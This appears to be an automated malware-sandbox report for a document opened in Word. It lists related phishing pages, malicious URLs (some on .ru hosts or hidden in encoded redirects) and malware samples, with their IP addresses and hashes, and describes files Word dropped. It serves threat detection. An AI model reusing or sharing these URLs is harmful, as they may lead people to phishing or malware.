                                                              https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                  vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                    https://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                                                      https://usemployee-hrdbenefits.comGet hashmaliciousUnknownBrowse
                                                                        A file has been sent to you via DROPBOX.pdfGet hashmaliciousUnknownBrowse
                                                                          DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            code.jquery.comEallentoff_401k_1484013830.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 151.101.194.137
                                                                            Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                                                                            • 151.101.66.137
                                                                            https://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                                            • 151.101.2.137
                                                                            https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                                            • 151.101.130.137
                                                                            NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
                                                                            • 151.101.194.137
                                                                            https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                            • 151.101.2.137
                                                                            https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                            • 151.101.66.137
                                                                            vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                            • 151.101.130.137
                                                                            https://fm.blebsions.com/R7tS/Get hashmaliciousUnknownBrowse
                                                                            • 151.101.194.137
                                                                            https://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                                                            • 151.101.2.137
                                                                            challenges.cloudflare.comNon-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                                                                            • 104.18.94.41
                                                                            https://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.18.95.41
                                                                            https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                                            • 104.18.95.41
                                                                            NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.18.94.41
                                                                            https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                            • 104.18.95.41
                                                                            https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                            • 104.18.95.41
                                                                            vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                            • 104.18.94.41
                                                                            https://fm.blebsions.com/R7tS/Get hashmaliciousUnknownBrowse
                                                                            • 104.18.95.41
                                                                            https://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                                                            • 104.18.94.41
                                                                            https://52kz793.afratradingagency.com/Get hashmaliciousHTMLPhisherBrowse
                                                                            • 104.18.95.41
                                                                            cdnjs.cloudflare.comEallentoff_401k_1484013830.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.24.14
                                                                            Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                                                                            • 104.17.25.14
                                                                            https://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.24.14
                                                                            https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.24.14
                                                                            NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.25.14
                                                                            https://init-area.fr/ABGet hashmaliciousUnknownBrowse
                                                                            • 104.17.25.14
                                                                            https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.euGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.24.14
                                                                            https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                            • 104.17.24.14
                                                                            https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                            • 104.17.24.14
                                                                            doc55334.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.24.14
                                                                            bg.microsoft.map.fastly.nethttps://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdfGet hashmaliciousPDFPhishBrowse
                                                                            • 199.232.214.172
                                                                            jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                            • 199.232.214.172
                                                                            RECOUVREMENT -FACTURER1184521.pdfGet hashmaliciousUnknownBrowse
                                                                            • 199.232.210.172
                                                                            QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                            • 199.232.214.172
                                                                            LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                            • 199.232.210.172
                                                                            YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                            • 199.232.214.172
                                                                            gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                            • 199.232.210.172
                                                                            H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                            • 199.232.214.172
                                                                            H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                            • 199.232.210.172
                                                                            KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                            • 199.232.214.172
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSPURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            • 104.21.67.152
                                                                            PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            • 172.67.177.134
                                                                            Eallentoff_401k_1484013830.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.18.11.207
                                                                            Hkeyboard.dllGet hashmaliciousUnknownBrowse
                                                                            • 104.21.40.214
                                                                            powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 1.13.202.149
                                                                            Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                            • 104.21.67.146
                                                                            Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                                                                            • 104.17.25.14
                                                                            rs.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                            • 172.67.211.185
                                                                            ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                            • 104.21.93.157
                                                                            hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                            • 172.65.251.78
                                                                            CLOUDFLARENETUSPURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            • 104.21.67.152
                                                                            PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            • 172.67.177.134
                                                                            Eallentoff_401k_1484013830.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.18.11.207
                                                                            Hkeyboard.dllGet hashmaliciousUnknownBrowse
                                                                            • 104.21.40.214
                                                                            powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 1.13.202.149
                                                                            Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                            • 104.21.67.146
                                                                            Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                                                                            • 104.17.25.14
                                                                            rs.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                            • 172.67.211.185
                                                                            ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                            • 104.21.93.157
                                                                            hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                            • 172.65.251.78
                                                                            CLOUDFLARENETUSPURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            • 104.21.67.152
                                                                            PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            • 172.67.177.134
                                                                            Eallentoff_401k_1484013830.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.18.11.207
                                                                            Hkeyboard.dllGet hashmaliciousUnknownBrowse
                                                                            • 104.21.40.214
                                                                            powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 1.13.202.149
                                                                            Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                            • 104.21.67.146
                                                                            Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                                                                            • 104.17.25.14
                                                                            rs.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                            • 172.67.211.185
                                                                            ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                            • 104.21.93.157
                                                                            hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                            • 172.65.251.78
                                                                            No context
                                                                            No context
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                            Category:dropped
                                                                            Size (bytes):4761
                                                                            Entropy (8bit):7.945585251880973
                                                                            Encrypted:false
                                                                            SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
                                                                            MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
                                                                            SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
                                                                            SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
                                                                            SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....*E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%*.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.*|.....VQ....<.*.......... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):340
                                                                            Entropy (8bit):3.2565883919783145
                                                                            Encrypted:false
                                                                            SSDEEP:6:kK8M5+7DNfUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:UjLkPlE99SCQl2DUeXJlOA
                                                                            MD5:1E0BC545650F38ACFF8E9BEBB6161999
                                                                            SHA1:C6131405D49A1D5F879C37BB42733CFB9C044C4F
                                                                            SHA-256:9DEAAF62AC1429A8B710F97FCEC7071BE5BF4EDA2621D65A8EB0378056C5952B
                                                                            SHA-512:8D7D82FC603D82BCF79CAADB7B4C822AC1F5D3CB0EEDD0F28FA93F33B96B2ADBC38CEC67EEC9A5529CBFD50C1A7D3C3D9414804E32C3F8921A94C508A4F5F2E9
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:p...... ........R..X#R..(....................................................... ........~..MG......&.....6.........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):521377
                                                                            Entropy (8bit):4.9084889265453135
                                                                            Encrypted:false
                                                                            SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                                                            MD5:C37972CBD8748E2CA6DA205839B16444
                                                                            SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                                            SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                                            SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                                            Category:dropped
                                                                            Size (bytes):773040
                                                                            Entropy (8bit):6.55939673749297
                                                                            Encrypted:false
                                                                            SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                                                            MD5:4296A064B917926682E7EED650D4A745
                                                                            SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                                            SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                                            SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):2278
                                                                            Entropy (8bit):3.852327017993776
                                                                            Encrypted:false
                                                                            SSDEEP:48:uiTrlKxsxxHtxl9Il8u27LzwlWVRNLkYKWbcpjvxt0id1rc:vnpYEEWrLkYPcpjvLQ
                                                                            MD5:40066E5208DDC43F3CE9A5D58C51EF68
                                                                            SHA1:40FD8540C085802A2E65CB7E1BF4D0537A40085E
                                                                            SHA-256:B38CDB1062CD2A24DF0EA3B64FF677B918684976B9C5C71C9EF671255FF2ACA1
                                                                            SHA-512:3136614365CC8FDF155D2D056DA91B834D39896E95A4E323EC429134297BFBD66A30D42755BD4A10F44658623A75EC06FD4488A8B831D8AFE76554D77371966A
                                                                            Malicious:false
                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.I.1./.u.C.t.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.y.Z.O.2.Z.m.
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):2684
                                                                            Entropy (8bit):3.908472809084244
                                                                            Encrypted:false
                                                                            SSDEEP:48:uiTrlKxJxWxl9Il8u2WOkGJs5AWjM57cGhupvEZNRq0YgPdpVl1sO2d/vc:XY3ys53M5RhuxEj8zgFpVl1zT
                                                                            MD5:E116AB1E16DB28B743B8112C56661E61
                                                                            SHA1:326A523C40B5B68D53FAA084755CA4567CA11ADE
                                                                            SHA-256:A4A2216AE52A78347FF38F62E863B40AA64C8C51D52E2D6221F54B05965426CA
                                                                            SHA-512:D4F3C0129A5747717358214AA6D06541F3C017926D93086B55BBCC421C0E4D0D98E1D2BEEC377A2163C48D12AFDFC34798884144DF1B5EE94B4B408B9CA75FDE
                                                                            Malicious:false
                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".4.s.I.h.0.P.R.w.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.y.Z.O.2.Z.m.
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):4542
                                                                            Entropy (8bit):4.000801181016884
                                                                            Encrypted:false
                                                                            SSDEEP:96:iYJJmd/wlQW9WQ5cheGXZzT2OBG03EUM/e9srMecfOD:iaJmFwl6QyheGdT3wnUMhrjSOD
                                                                            MD5:14F023D0A5F017ACEBE083746C160BAA
                                                                            SHA1:406874B8A97BE15BF6EFE8E93DB89A20C8565FD5
                                                                            SHA-256:8E6B189FF20FBC4B5FE3336836F597CBD560DCC3096617F6A74CCF98E7198A8E
